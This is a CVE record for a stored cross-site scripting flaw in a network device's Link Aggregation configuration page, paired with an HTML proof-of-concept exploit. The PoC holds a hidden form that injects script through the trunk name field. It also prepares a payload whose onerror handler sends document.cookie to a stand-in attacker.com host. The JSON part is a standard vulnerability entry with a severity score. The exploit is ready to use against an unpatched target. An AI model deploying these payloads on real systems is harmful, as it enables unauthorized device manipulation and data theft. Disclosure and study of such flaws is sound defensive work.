CVE-2026-22322

<!-- CVE-2026-22322 Stored XSS PoC for Link Aggregation Configuration --> <!-- Attack Vector: Inject malicious JavaScript via trunk entry name --> <!DOCTYPE html> <html> <head> <title>CVE-2026-22322 PoC</title> </head> <body> <h2>CVE-2026-22322 Stored XSS PoC</h2> <form id="xssForm" action="[TARGET_URL]/link-aggregation/config" method="POST"> <input type="hidden" name="action" value="create_trunk"> <input type="hidden" name="trunk_name" value='"><script>alert("XSS")</script><x y="'> <input type="hidden" name="interfaces" value="eth0,eth1"> <input type="hidden" name="mode" value="LACP"> </form> <script> // More sophisticated payload example const payload = { trunk_name: '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">', interfaces: 'eth0,eth1', mode: 'LACP' }; // Auto-submit form to inject XSS // document.getElementById('xssForm').submit(); console.log('PoC payload prepared:', payload); console.log('Target: Link Aggregation configuration interface'); console.log('Vulnerability: Stored XSS in trunk entry name field'); </script> </body> </html>

{"cve": {"id": "CVE-2026-22322", "sourceIdentifier": "[email protected]", "published": "2026-03-18T08:16:30.000", "lastModified": "2026-04-27T19:22:08.623", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross‑site scripting (XSS) vulnerability in the Link Aggregation configuration interface allows an unauthenticated remote attacker to create a trunk entry containing malicious HTML/JavaScript code. When the affected page is viewed, the injected script executes in the context of the victim’s browser, enabling unauthorized actions such as interface manipulation. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) almacenado en la interfaz de configuración de Agregación de Enlaces permite a un atacante remoto no autenticado crear una entrada de troncal que contenga código HTML/JavaScript malicioso. Cuando se visualiza la página afectada, el script inyectado se ejecuta en el contexto del navegador de la víctima, lo que permite acciones no autorizadas como la manipulación de la interfaz. La cookie de sesión está protegida por la bandera httpOnly. Por lo tanto, un atacante no puede tomar el control de la sesión de un usuario autenticado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-104", "source": "[email protected]"}]}}